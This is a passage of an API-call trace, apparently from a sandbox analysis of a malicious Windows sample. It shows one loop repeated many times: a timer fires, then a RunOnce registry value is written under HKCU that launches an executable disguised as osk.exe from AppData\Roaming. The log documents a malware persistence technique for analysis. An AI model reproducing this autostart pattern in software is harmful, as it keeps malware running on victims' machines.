uIDEvent=0x2249) returned 1 [0093.763] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.763] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.763] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.763] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.764] RegCloseKey (hKey=0x280) returned 0x0 [0093.764] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.764] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.764] SetTimer (hWnd=0x20280, nIDEvent=0x224a, uElapse=0xa, lpTimerFunc=0x0) returned 0x224a [0093.764] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.777] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.777] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.777] KillTimer (hWnd=0x20280, uIDEvent=0x224a) returned 1 [0093.778] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.778] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.778] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.778] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.779] RegCloseKey (hKey=0x280) returned 0x0 [0093.779] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.779] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.779] SetTimer (hWnd=0x20280, nIDEvent=0x224b, uElapse=0xa, lpTimerFunc=0x0) returned 0x224b [0093.779] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.375] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.375] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.375] KillTimer (hWnd=0x20280, uIDEvent=0x224b) returned 1 [0094.375] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.376] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.376] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.376] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.376] RegCloseKey (hKey=0x280) returned 0x0 [0094.376] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.376] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.377] SetTimer (hWnd=0x20280, nIDEvent=0x224c, uElapse=0xa, lpTimerFunc=0x0) returned 0x224c [0094.377] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.387] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.387] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.387] KillTimer (hWnd=0x20280, uIDEvent=0x224c) returned 1 [0094.388] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.388] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.388] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.388] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.388] RegCloseKey (hKey=0x280) returned 0x0 [0094.389] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.389] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.389] SetTimer (hWnd=0x20280, nIDEvent=0x224d, uElapse=0xa, lpTimerFunc=0x0) returned 0x224d [0094.389] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.404] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.404] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.404] KillTimer (hWnd=0x20280, uIDEvent=0x224d) returned 1 [0094.404] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.405] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.405] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.405] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.405] RegCloseKey (hKey=0x280) returned 0x0 [0094.405] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.405] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.405] SetTimer (hWnd=0x20280, nIDEvent=0x224e, uElapse=0xa, lpTimerFunc=0x0) returned 0x224e [0094.406] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.417] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.417] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.418] KillTimer (hWnd=0x20280, uIDEvent=0x224e) returned 1 [0094.418] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.418] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.418] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.418] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.419] RegCloseKey (hKey=0x280) returned 0x0 [0094.419] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.419] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.419] SetTimer (hWnd=0x20280, nIDEvent=0x224f, uElapse=0xa, lpTimerFunc=0x0) returned 0x224f [0094.419] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.433] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.433] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.433] KillTimer (hWnd=0x20280, uIDEvent=0x224f) returned 1 [0094.434] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.434] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.434] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.434] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.435] RegCloseKey (hKey=0x280) returned 0x0 [0094.435] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.435] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.435] SetTimer (hWnd=0x20280, nIDEvent=0x2250, uElapse=0xa, lpTimerFunc=0x0) returned 0x2250 [0094.435] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.448] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.448] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.448] KillTimer (hWnd=0x20280, uIDEvent=0x2250) returned 1 [0094.449] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.449] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.449] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.449] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.449] RegCloseKey (hKey=0x280) returned 0x0 [0094.449] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.450] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.450] SetTimer (hWnd=0x20280, nIDEvent=0x2251, uElapse=0xa, lpTimerFunc=0x0) returned 0x2251 [0094.450] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.464] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.464] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.464] KillTimer (hWnd=0x20280, uIDEvent=0x2251) returned 1 [0094.464] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.465] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.465] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.465] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.465] RegCloseKey (hKey=0x280) returned 0x0 [0094.465] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.465] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.465] SetTimer (hWnd=0x20280, nIDEvent=0x2252, uElapse=0xa, lpTimerFunc=0x0) returned 0x2252 [0094.465] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.480] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.480] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.480] KillTimer (hWnd=0x20280, uIDEvent=0x2252) returned 1 [0094.480] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.481] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.481] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.481] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.481] RegCloseKey (hKey=0x280) returned 0x0 [0094.481] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.481] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.481] SetTimer (hWnd=0x20280, nIDEvent=0x2253, uElapse=0xa, lpTimerFunc=0x0) returned 0x2253 [0094.481] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.495] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.495] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.495] KillTimer (hWnd=0x20280, uIDEvent=0x2253) returned 1 [0094.495] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.496] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.496] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.496] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.496] RegCloseKey (hKey=0x280) returned 0x0 [0094.496] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.496] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.497] SetTimer (hWnd=0x20280, nIDEvent=0x2254, uElapse=0xa, lpTimerFunc=0x0) returned 0x2254 [0094.497] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.510] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.510] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.511] KillTimer (hWnd=0x20280, uIDEvent=0x2254) returned 1 [0094.511] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.511] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.511] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.511] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.512] RegCloseKey (hKey=0x280) returned 0x0 [0094.512] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.512] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.512] SetTimer (hWnd=0x20280, nIDEvent=0x2255, uElapse=0xa, lpTimerFunc=0x0) returned 0x2255 [0094.512] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.526] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.526] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.527] KillTimer (hWnd=0x20280, uIDEvent=0x2255) returned 1 [0094.527] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.527] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.527] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.528] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.528] RegCloseKey (hKey=0x280) returned 0x0 [0094.528] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.528] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.528] SetTimer (hWnd=0x20280, nIDEvent=0x2256, uElapse=0xa, lpTimerFunc=0x0) returned 0x2256 [0094.528] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.542] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.542] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.542] KillTimer (hWnd=0x20280, uIDEvent=0x2256) returned 1 [0094.542] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.543] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.543] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.543] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.543] RegCloseKey (hKey=0x280) returned 0x0 [0094.543] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.543] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.543] SetTimer (hWnd=0x20280, nIDEvent=0x2257, uElapse=0xa, lpTimerFunc=0x0) returned 0x2257 [0094.544] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.557] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.558] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.558] KillTimer (hWnd=0x20280, uIDEvent=0x2257) returned 1 [0094.558] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.558] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.558] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.559] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.559] RegCloseKey (hKey=0x280) returned 0x0 [0094.559] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.559] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.559] SetTimer (hWnd=0x20280, nIDEvent=0x2258, uElapse=0xa, lpTimerFunc=0x0) returned 0x2258 [0094.559] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.573] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.573] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.573] KillTimer (hWnd=0x20280, uIDEvent=0x2258) returned 1 [0094.573] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.574] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.574] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.574] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.574] RegCloseKey (hKey=0x280) returned 0x0 [0094.574] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.575] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.575] SetTimer (hWnd=0x20280, nIDEvent=0x2259, uElapse=0xa, lpTimerFunc=0x0) returned 0x2259 [0094.575] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.589] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.589] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.590] KillTimer (hWnd=0x20280, uIDEvent=0x2259) returned 1 [0094.590] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.590] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.590] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.591] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.591] RegCloseKey (hKey=0x280) returned 0x0 [0094.591] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.591] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.591] SetTimer (hWnd=0x20280, nIDEvent=0x225a, uElapse=0xa, lpTimerFunc=0x0) returned 0x225a [0094.591] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.613] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.613] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.613] KillTimer (hWnd=0x20280, uIDEvent=0x225a) returned 1 [0094.613] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.614] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.614] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.614] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0094.614] RegCloseKey (hKey=0x280) returned 0x0 [0094.615] IUnknown:Release (This=0x7a9740) returned 0x1 [0094.615] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.615] SetTimer (hWnd=0x20280, nIDEvent=0x225b, uElapse=0xa, lpTimerFunc=0x0) returned 0x225b [0094.615] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0094.620] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0094.620] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0094.620] KillTimer (hWnd=0x20280, uIDEvent=0x225b) returned 1 [0094.620] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0094.621] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0094.621] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0094.621] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 